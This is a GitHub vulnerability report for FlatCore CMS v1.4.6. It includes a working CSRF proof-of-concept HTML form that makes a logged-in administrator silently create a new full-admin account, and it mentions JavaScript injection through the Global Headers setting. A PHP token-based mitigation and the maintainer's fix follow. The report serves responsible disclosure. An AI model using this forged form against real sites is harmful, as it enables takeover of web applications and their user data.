
CSRF Privilege Escalation (Creation of an administrator account) on FlatCore v1.4.6 #27

Closed
shardulm94 opened this issue Apr 8, 2017 · 2 comments

@shardulm94
commented Apr 8, 2017

Exploit Title: CSRF Privilege Escalation (Creation of an administrator account) on FlatCore v1.4.6
Date: 08-April-2017
Exploit Author: @shardulm94
Software Link: https://github.com/flatCore/flatCore-CMS/archive/v1.4.6.zip
Version: 1.4.6

Description:
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background. In the case of FlatCore, we can use CSRF to perform actions on the admin dashboard by targeting an administrator.

Exploit:
We assume that FlatCore is installed at http://localhost/. Our target is acp/acp.php?tn=user&sub=new&edituser= which is the page used to create a new user. The given POC will create a user on the website which has full administrator privileges.

<html>
<body>
    <form method="POST" action="http://localhost/acp/acp.php?tn=user&sub=new&edituser=">
        <input type="hidden" name="user_nick" value="testcsrf" />
        <input type="hidden" name="user_registerdate" value="" />
        <input type="hidden" name="user_verified" value="verified" />
        <input type="hidden" name="nbr_of_groups" value="0" />
        <input type="hidden" name="user_newsletter" value="none" />
        <input type="hidden" name="user_firstname" value="" />
        <input type="hidden" name="user_lastname" value="" />
        <input type="hidden" name="user_mail" value="csrf@csrf.com" />
        <input type="hidden" name="user_company" value="" />
        <input type="hidden" name="user_street" value="" />
        <input type="hidden" name="user_street_nbr" value="" />
        <input type="hidden" name="user_zipcode" value="" />
        <input type="hidden" name="user_city" value="" />
        <input type="hidden" name="user_psw_new" value="test" />
        <input type="hidden" name="user_psw_reconfirmation" value="test" />
        <input type="hidden" name="user_psw" value="" />
        <input type="hidden" name="drm_acp_class" value="administrator" />
        <input type="hidden" name="drm_acp_pages" value="drm_acp_pages" />
        <input type="hidden" name="drm_acp_editpages" value="drm_acp_editpages" />
        <input type="hidden" name="drm_acp_editownpages" value="drm_acp_editownpages" />
        <input type="hidden" name="drm_acp_files" value="drm_acp_files" />
        <input type="hidden" name="drm_acp_user" value="drm_acp_user" />
        <input type="hidden" name="drm_acp_system" value="drm_acp_system" />
        <input type="hidden" name="drm_moderator" value="drm_moderator" />
        <input type="hidden" name="drm_can_publish" value="drm_can_publish" />
        <input type="hidden" name="save_the_user" value="Save User" />
        <input type="submit" value="Submit!" />
    </form>
</body>
</html>

Before running the POC, make sure you are logged in to an administrator account. Then open the HTML file and submit the form. The new user with admin rights should now have been created.

References:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

Screenshots:
[screenshot: Before the exploit]
[screenshot: Exploit Page]
[screenshot: After submitting the form]
[screenshot: New user added]
[screenshot: With admin access]

Impact: Compromises the entire web application and user data
Mitigation: Use of CSRF tokens

Creation of a user account was just an example. Other pages/settings in the admin dashboard are also vulnerable to CSRF. For example, the Global Headers (HTML) features can be misused to inject JS into the website.
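The mitigation named above is the synchronizer-token pattern: the server binds a random secret to the logged-in session, embeds it in every state-changing form, and rejects any POST that does not carry it back. The following PHP is an added illustration written for this issue; it is not FlatCore's code and not the fix referenced in the thread. The function names `csrf_token` and `csrf_check` and the hidden field name `csrf_token` are assumptions for the demo; the form action and the `save_the_user` field are taken from the POC above.

```php
<?php
// Added example (not FlatCore code): a minimal synchronizer-token pattern for an
// admin form such as acp/acp.php?tn=user&sub=new. Function and field names
// (csrf_token, csrf_check, the "csrf_token" input) are assumptions for this demo.

declare(strict_types=1);

// Defense in depth (PHP 7.3+): a SameSite=Lax session cookie is not sent on
// cross-site top-level POSTs, so the forged form loses the admin session anyway.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Return the session's CSRF token, creating one on first use.
// 32 bytes from the CSPRNG, hex-encoded so it is safe inside an HTML attribute.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Validate the token submitted with a state-changing request.
// hash_equals() compares in constant time so the check does not leak timing.
function csrf_check(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

// Reject any POST that lacks a valid token before the handler touches user data.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // The original "save_the_user" handling would run here, only after the check.
}

$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
?>
<form method="POST" action="acp.php?tn=user&amp;sub=new&amp;edituser=">
    <input type="hidden" name="csrf_token" value="<?= $token ?>" />
    <!-- the existing user_* and drm_* fields follow unchanged -->
    <input type="submit" name="save_the_user" value="Save User" />
</form>
```

Against the POC above this is sufficient because the attacker's page, served from another origin, cannot read the admin dashboard's HTML and therefore cannot learn the session's token; its POST arrives without a valid `csrf_token` and is refused with 403 before any user is created. The token must be checked on every handler that changes state, which is why the follow-up fix covers all forms under /acp/ rather than just the user-creation page.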

@patkon (Member)

commented Apr 8, 2017

Woah. Thank you for the detailed description. I'll try to fix that as soon as possible.

@patkon (Member)

commented Apr 12, 2017

All forms in /acp/ now use a CSRF token.
9a5e2c4

@shardulm94 shardulm94 closed this Jun 14, 2017
